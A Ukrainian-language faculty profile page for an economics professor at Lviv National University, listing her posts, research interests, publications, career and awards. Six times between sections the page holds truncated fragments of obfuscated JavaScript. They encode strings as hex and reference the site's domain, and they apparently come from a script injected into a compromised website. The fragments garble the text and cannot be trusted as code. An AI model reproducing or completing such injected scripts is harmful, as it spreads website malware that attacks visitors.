Ситник Наталія Степанівна

Посада: заступник декана факультету управління фінансами та бізнесу з навчально-методичної роботи, завідувач кафедри державних та місцевих фінансів

Науковий ступінь: доктор економічних наук

Вчене звання: доцент

Телефон (робочий): (032) 235-64-59

Електронна пошта: nataliya.sytnyk@lnu.edu.ua

Профіль у Google Scholar: scholar.google.com.ua

Наукові інтереси

Внутрішній ринок України; соціально-економічний розвиток території; фінансово-інвестиційне забезпечення розвитку торговельних підприємств (сфера наукових інтересів) та кредитно-модульна система організації навчального процесу, форми навчання (сфера педагогічних інтересів)  Автор понад 67 наукових та науково-методичних праць, монографій та навчальних посібників.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Курси

Публікації

 

  1. Ситник Н. С. Розвиток інноваційної діяльності суб’єктів фінансово-економічної системи сфери товарного обігу / Ситник Н. С. // Вісник Університету банківської справи Національного банку України : збірник наукових праць. – Вип. 2 (17). – Київ, 2013. – С. 57-61.
  2. Ситник Н. С. Формування концептуальної моделі управління інвестиційною базою модернізації сфери товарного обігу / Н. С. Ситник // Економічна стратегія і перспективи розвитку сфери торгівлі та послуг : збірник наукових праць ДонНУЕТ. – Вип. 2 (18). – Харків, 2013. – С. 282-291.
  3. Ситник Н. С. Стимулювання інвестиційно-інноваційної модернізації сфери товарного обігу / Н. С. Ситник // Наукові записки ЛУБП : зб. наук. праць. – Львів : НУ ЛП, 2013. – Вип. 11. – С. 123-126.
  4. Ситник Н. С. Інвестиційно-інноваційні механізми модернізації сфери товарного обігу /Н. С. Ситник // Економічні науки : збірник наукових праць БДФЕУ. – Вип. 2 (25). – Чернівці, 2013. – С. 131-136.
  5. Ситник Н. С. Реалізація державної політики модернізації трудового потенціалу сфери товарного обігу /Н. С. Ситник // Науковий вісник Полтавського університету економіки і торгівлі. – Полтава, 2013. – Вип. 2 (58). – С. 187-192.
  6. Ситник Н. С. Державна політика модернізації сфери товарного обігу України / Н. С. Ситник // Модернізація системи державного управління: теорія та практика : зб. матеріалів Міжнар. наук.-практ. конф. 11 квітня 2014 р. – Львів : ЛРІДУ НАДУ, 2014. – Ч. 1. – С. 227-231.
  7. Ситник Н. С. Напрями модернізації роздрібної торгівлі України / Н. С. Ситник // Регіонально-кластерна політика у розвитку світової та української економіки : зб. матеріалів Міжнар. наук.-практ. конф. 24-25 квітня 2014 р. – Чернівці : ЧТЕЦ КНТЕУ, 2014. – С. 360-363.
  8. Ситник Н. С. Социально-экономические векторы развития национальных экономик: Болгария, Украина : монография / под общ. ред. А. Шубина. – Варна : Варненский экономический университет, 2014. – 596 с.
  9. Sytnyk N. S. Features of competitive trade’s formationin Ukraine / N. S. Sytnyk // Journal L’ Association 1901 «SEPIKE». – France : Ausgabe 4 ; Osthofen, Deutschland, 2014. – С. 228-233.
  10. Ситник Н. С. Модернизация финансово-экономической системы и механизмов функционирования сферы товарного обращения / Н. С. Ситник // Научно-технические ведомости: Экономические науки. – СПб : Изд-во Санкт-Петербургского государственного политехнического университета, 2014. – Вып. 2 (192). – С. 131-138. 
  11. Ситник Н. С. Внутрішня торгівля України: проблеми і перспективи розвитку : монографія / Н. С. Ситник, І. М. Копич, О. О. Нестуля та ін. ; [за ред. проф. В. В. Апопія, проф. П. Ю. Балабана]. – Львів : «Новий Світ – 2000», 2014. – 565 с.
  12. Ситник Н. С. Особливості модернізації фінансово-економічної системи сфери товарного обігу України / Н. С. Ситник // Економічний нобелівський вісник. – Дніпропетровськ, 2014. – Вип. 1 (7). – С. 417-425.
  13. Ситник Н. С. Дослідження процесу модернізації організаційної системи управління розвитком сфери товарного обігу / Ситник Н. С. // Ефективність державного управління : збірник наукових праць ЛРІДУ НАДУ. – Вип. 38. – Львів, 2014.
  14. Ситник Н. С. Інноваційні фактори модернізації сфери товарного обігу / Н. С. Ситник // Вісник ХДУ. – Херсон, 2014. – Вип. 5. – Серія: Економічні науки. – С. 264-267.
  15. Ситник Н. С. Внутрішня торгівля в економічній системі України / Н. С. Ситник // Економіка, фінанси, право. – Київ, 2014. – Вип. 5. – С. 8-13.
  16. Глобальна економіка. Курс лекцій [Текст] : навч. посіб. / Гупало О.Г., Ситник Н.С., Бугіль С.Я. за заг. ред. Гупала О.Г. – Львів, ЛДФА, 2015. – 283 с.
  17. Ситник Н.С. Врахування соціонічних типів в процесі антикризового менеджменту трудового потенціалу підприємств сфери товарного обігу / Н.С. Ситник, О.В. Герасименко та ін. //Economic efficiency of business in the conditions ofunstable economy (Економічна ефективність підприємництва в умовах нестабільної економіки) : Collective monograph –Aspect Publishing, Taunton, MA, USA, 2015. – 332  – 2.4. – С. 171-177.
  18. Sytnyk N. Role of transport logistics in the internal trade competitiveness increase /  Sytnyk, O. Gerasymenko //Yale Review of Education and Science, 2015, No.1. (16), (January-June). Volume VI. “Yale University Press”, 2015. – P. 189-195. (Proceedings of the Journal are located in the Databases Scopus. Source Normalized Impact per Paper (SNIP): 4.865. SCImago Journal Rank (SJR): 4.875).
  19. Sytnyk N. Influence of investments into trade sphere on a financial system firmness and balancing / N. Sytnyk, O. Gerasymenko // Proceedings of the VIIInternational Academic Congress «ModernWorld: Politics, Economy, Culture, History, Technology, Science andEducation» (Canada, Ottawa, 18-20 March 2015).«Ottawa University Press»,– P. 159-164.
  20. Бюджетно-податкова політика активізації підприємництва в Україні: кол. моногр. / [Стасишин А.В., Ситник Н.С., Ватаманюк-Зелінська У.З. та ін.]; під заг. ред. д.е.н. Ситник Н.С. – Львів : «Сполом», 2016. – Ч.1. – 412 с.
  21. Sytnyk N. Problems and prospects of fiscal management in the field of trade (Проблеми та перспективи фіскального управління у сфері торгівлі) / N. Sytnyk, O. Gerasymenko / Problems of social and economic development of the business: national and international experience (Проблемы социально-экономического развития предпринимательства: отечественный и зарубежный опыт) : Collective monograph. – Editorial Arane, S.A. de C.V., Mexico City, Mexico, 2016. – Р. 66-76.
  22. Ситник Н.С. Інноваційні чинники та механізми модернізації сфери внутрішньої торгівлі. /Ситник Н. С. // Вісник Львівської комерційної академії. – Львів: Вип. 50. – 2016. – С. 23 – 29.
  23. Ситник В.Ю. Формування конкурентоспроможної системи сфери товарного обігу на основі модернізації / Н. С. Ситник, В. Ю. Ситник // Вісник ОНУ. – Одеса, 2016. – Том 21. Вип. 6(48). – Серія: Економічні науки. – С. 70-74.
  24. Ситник Н.С. Вплив інноваційних факторів на модернізацію внутріщньої торгівлі / Н.С. Ситник // International Scientific Conference: Development of social and economic systems in a global competitive environment, February 26, 2016. Chisinau, Republika Moldova, 302 p.
  25. Sytnyk. Directions implementation of fiscal policy Ukraine. / International Scientific-Practical Conference From Baltic to Blanck Sea: National Models of Economic Systems: Conference Proceedings, Part I, March 25, 2016. Riga: Baltja Publishng. 356 pages.
  26. Ситник Н.С. Стан зовнішньоекономічної діяльності України в умовах євроінтеграції / Н.С. Ситник // [Тези доповідей I Міжнародної науково-практичної конференції «Формування нової парадигми управління фінансами та бізнесом в умовах посилення євроінтеграційних процесів в Україні»], (м. Львів, 27 жовтня 2016 р.). – Львів : ЛНУ ім. І.Франка, 2016. – С. 42-46.
  27. Ситник Н.С. Формування конкурентоспроможної системи сфери товарного обігу на основі модернізації / Н. С. Ситник // Вісник ОНУ. – Одеса, 2016. – Том 21. Вип. 6(48). – Серія: Економічні науки. – С. 70-74.
  28. Ситник. Н.С. Бюджетно-податкова політика України та напрями її реалізації. / Ситник Н. С., Ярема Б.П.// Вісник Хмельницького національного університету. – Львів: Економічні науки №2 т.1 (234). – 2016. – С.75 – 80. (Index Copernicus)
  29. Ситник Н.С., Старух, А.І. Сучасний стан розвитку під­при­ємництва в державному секторі економіки / Н.С. Ситник, А.І. Старух // Науковий вісник Міжнародного гу­манітарного університету. – Одеса, 2016. – №22. – С. 4-8.
  30. Ситник Н. С., Бурзак О.П. Аналіз ефективності процедур митного контролю Н.С. Ситник, О.П. Бурзак // Науковий вісник ХДУ. – Херсон, 2017. – Вип. 23.Ч.3. – Серія: Економічні науки. – С. 119-123.
  31. Ситник Н. С. Передумови активізації підприємництва на сучасному етапі економічного розвитку держави / Н.С. Ситник // Збірник тез звітної наукової конференції Львівського національного університету імені Івана Франка за 2016 рік (електронне видання) : Секція факультету управління фінансами та бізнесу, (Львів, 2-8 лютого 2017 р.). – Львів : ЛНУ ім. І.Франка, 2017.– С. 16-20.
  32. Ситник Н. С. Інноваційні можливості інституційної інфраструктури сфери товарного обігу / Н. С. Ситник // Матеріали ІV Міжнародної науково-практичної конференції “Проблеми формування та розвитку інноваційної інфраструктури: виклики постіндустріальної економіки”, Львів, 18–19 травня 2017 р. – С. 375-377.
  33. Конкурентоспроможність національної економіки: фіскальні важелі та стимули : кол. моногр. / [Ситник Н.С., Стасишин А.В., Ватаманюк-Зелінська У.З.]; під заг. ред. д.е.н. Ситник Н.С. – Львів : «Апріорі», 2017. – Ч.2. – 512 с.
  34. Бюджетна система в таблицях і схемах : Навчальний посібник / [Ситник Н.С., Західна О.Р., Стасишин А.В., Шушкова Ю.В]. – Львів : Видавництво: Апріорі, 2017. – 180 с.
  35. Глобальна економіка. Курс лекцій : навч. посіб. / За заг. ред. Гупала О.Г., Стасишина А.В.] – 2-ге вид., доп., ‒ Львів : СПОЛОМ, 2017. – 316 с.
  36. Natalia Sytnyk. Influence of investment policy on financial safety of the state in context of balancing/ Natalia Sytnyk, Olena Gerasymenko //Finanse i rachunkowość , red. Anna Ćwiąkała-Małys // Prace Naukowe Wydziału Prawa, Administracji i Ekonomii Uniwersytetu Wrocławskiego. – Wrocław. – N 5/2018. – P. 145-159
  37. Ситник Н.С. Сучасний стан розвитку торговельно-економічних відносин України з Європейським Союзом / Н.С. Ситник, Г.І. Юркевич // Молодий вчений. – 2018. – №2(54). – С. 417-421 Index Copernicus
  38. Ситник Н.С. Покращення фінансового стану підприємств на основі диверсифікації виробництва та капіталу / Н.С. Ситник, І.І. Грицько // Інноваційна економіка. – 2017. – № 11-12. – С. 201-212 Index Copernicus
  39. Ситник Н.С. Фінансові аспекти складників економічної безпеки держави / Н.С. Ситник, Б.О. Стефанків // Науково-виробничий журнал «Бізнес навігатор». – 2018. – Випуск 1-2(44). – С. 136-140 Index Copernicus
  40. Sytnyk Natalia The role of information technologies in the development of the customs system of Ukraine / Natalia Sytnyk, Lesya Dzhuhan // Ukraine – EU/ Innovations in Education, Technology, Business and Law: collection of international scientific papers. – Chernihiv: CNUT, 2018. – P. 249-252.
  41. Ситник Н.С. Роль малого та середнього бізнесу на сучасному етапі розвитку економіки України / Н.С. Ситник, С.І. Козак // Науковий журнал «Причорноморські економічні студії». – 2018. – Випуск 26. Ч.1. – С. 83-87. Index Copernicus
  42. Ситник Н.С. Інформаційні технології у діяльності Державної митної служби України / Н.С. Ситник, Л. Б. Джуган // Збірник наукових праць «Проблеми системного підходу в економіці». – 2018. – Випуск 1 (63). – С. 154-159.
  43. Ситник Н.С. Ефективність державних закупівель у сфері охорони здоров’я / Н.С. Ситник, М.-С.Т. Баранова // Економіка, фінанси, право. – 2018. – № 3. – С. 18 -24. Index Copernicus
  44. Ситник Н. С. Проблеми та перспективи становлення та розвитку бюджетного менеджменту в Україні / Н. С. Ситник, Д.Я. Субицька // Молодий вчений. – 2018. – №10(62). – С. 410-415 Index Copernicus
  45. Ситник Н.С. Напрями поліпшення фінансового регулювання розвитку підприємництва на державному рівні // С.Д. Смолінська // Збірник наукових праць. Науковий вісник Міжнародного гуманітарного університету. Серія : Економіка і менеджмент. Випуск 28. – Одеса, 2017. – С. 151-155. Index Copernicus
  46. Ситник Н. С. Розвиток франчайзингу в Україні як складник інвестиційної політики держави / Н. С. Ситник, Д. В. Попович, // Науково-виробничий журнал «Бізнес-навігатор». – 2018. – Вип. 1-2(44). – С. 140-144. Index Copernicus

Біографія

ОСВІТА:

2015 – захист докторської дисертації за спеціальністю 08.00.03 – економіка та управління національним господарством.

2006 – присвоєно вчене звання доцента кафедри економіки та підприємництва.

2005 – захист кандидатської дисертації за спеціальністю 08.00.04 – економіка та управління підприємствами (за видами економічної діяльності)

1984 – 1989 – економічний факультет Львівського торгово-економічного інституту, економіст

 

РОБОТА:

2015 – професор кафедри державних та місцевих фінансів ЛНУ ім. І.Франка

2008 – 2015 – перший проректор Львівської державної фінансової академії.

2003 – 2008 – декан факультету післядипломної освіти

2000 – 2003 – завідувач підготовчим відділенням

1998 – ст. викладач Львівського фінансово-економічного інституту

1989 – викладач Львівського фінансово-економічного коледжу

Проекти

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Нагороди

Почесна грамота Міністерства освіти і науки України (2007 р),  Медаль «За заслуги перед ЛДФА» (2007 р.),   Почесна грамота Міністерства фінансів України (2010 р.),    Почесна грамота ЛДФА (2010 р., 2013 р.).

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “financial.lnu.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Розклад